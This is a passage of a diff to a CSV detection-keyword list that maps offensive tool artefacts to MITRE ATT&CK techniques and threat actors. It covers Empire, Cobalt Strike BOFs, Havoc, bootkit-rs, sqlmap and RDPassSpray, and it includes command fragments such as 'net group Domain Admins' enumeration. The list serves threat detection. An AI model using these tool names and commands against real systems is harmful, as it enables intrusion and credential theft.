-"*WScriptBypassUAC*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1131","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*wscript_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*WScriptBypassUAC*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1131","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*wsl kali-linux*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","wsl execution","N/A","N/A","N/A","N/A","N/A","N/A" -"*WSPCoerce.ex*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","202","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" -"*WSPCoerce-main*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","202","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"*WSPCoerce.ex*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"*WSPCoerce-main*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*WSUSpendu*","offensive_tool_keyword","WSUSpendu","At BlackHat USA 2015. the WSUSpect attack scenario has been released.Approximately at the same time. some french engineers have been wondering if it would be possible to use a compromised WSUS server to extend the compromise to its clients. similarly to this WSUSpect attack. After letting this topic rest for almost two years. we've been able. at Alsid and ANSSI. 
to demonstrate this attack.","T1563 - T1204 - T1210 - T1071","TA0001 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AlsidOfficial/WSUSpendu","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wsuxploit*","offensive_tool_keyword","wsuxploit","This is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic. It is based on the WSUSpect Proxy application that was introduced to public on the Black Hat USA 2015 presentation. 'WSUSpect Compromising the Windows Enterprise via Windows Update","T1557.001 - T1557.002 - T1573 - T1210.001","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/pimps/wsuxploit","1","1","N/A","N/A","3","267","50","2022-11-25T10:04:15Z","2017-06-30T01:06:41Z" "*wts_enum_remote_processes*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","104","12","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" 
@@ -18490,37 +18678,37 @@ "*www.kali.org/get-kali/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*www.securityfocus.com/archive/1/514379*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*www.vsecurity.com/download/tools/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*www.wfuzz.org*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*wxfuzz.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*wxfuzz.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 
Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*www.wfuzz.org*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wxfuzz.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wxfuzz.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*WypdIENhbid0IENvbm5lY3QgQWxpeXVuIEJ1Y2tldC4=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*WypdIFRoZSBCdWNrZXQgb3IgUmVmbGVjdGl2ZSBETEwgVVJJIGlzIEVtcHR5Lg==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*WytdIEluamVjdGVkIHRoZSA=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"*-x *net group *Domain Admins* /domain*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*-x *net group *Domain Admins* /domain*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. 
and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" "*X32_ClSp_Tcp_Exe.exe*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*X64_ClSp_Tcp_Exe.exe*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*x64PELoader/*.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*x64win-DynamicNoNull-WinExec-PopCalc-Shellcode*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","","","" -"*x86_64-unknown-uefi*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","448","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*x86_64-unknown-uefi*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*x86PELoader/*.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - 
TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*x86PELoader/test_agent_dll*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*x86PELoader/test_agent_exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*x86PELoader/test_proxy_dll*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*x86PELoader/test_proxy_exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*x90skysn3k*","offensive_tool_keyword","Github Username","Github username known for password exploitation and offensive tools","N/A","N/A","N/A","N/A","Exploitation 
tools","https://github.com/x90skysn3k","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*xato-net-10-million-usernames.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*xato-net-10-million-usernames.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*X-C2-Beacon*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*xcopy /y /d *\msquic_schannel\msquic.dll*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","0","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*xforcered/CredBandit*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" 
"*xforcered/Detect-Hooks*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/Detect-Hooks","1","1","N/A","10","10","91","6","2021-07-22T20:13:16Z","2021-07-23T16:10:37Z" -"*xforwardedfor.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*xforwardedfor.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*xFreed0m/RDPassSpray*","offensive_tool_keyword","RDPassSpray","Python3 tool 
to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*xfreerdp /v*SOCtest*AllLegitHere*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*xfrm_poc*lucky0*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*xillwillx*","offensive_tool_keyword","Github Username","github repo username hosting red team tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/xillwillx","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*XiphosResearch*","offensive_tool_keyword","exploits","Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.","T1203 - T1068 - T1062 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/XiphosResearch/exploits","1","0","N/A","N/A","10","1433","606","2023-07-20T10:15:01Z","2015-03-05T11:15:07Z" -"*x-ishavocframework*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - 
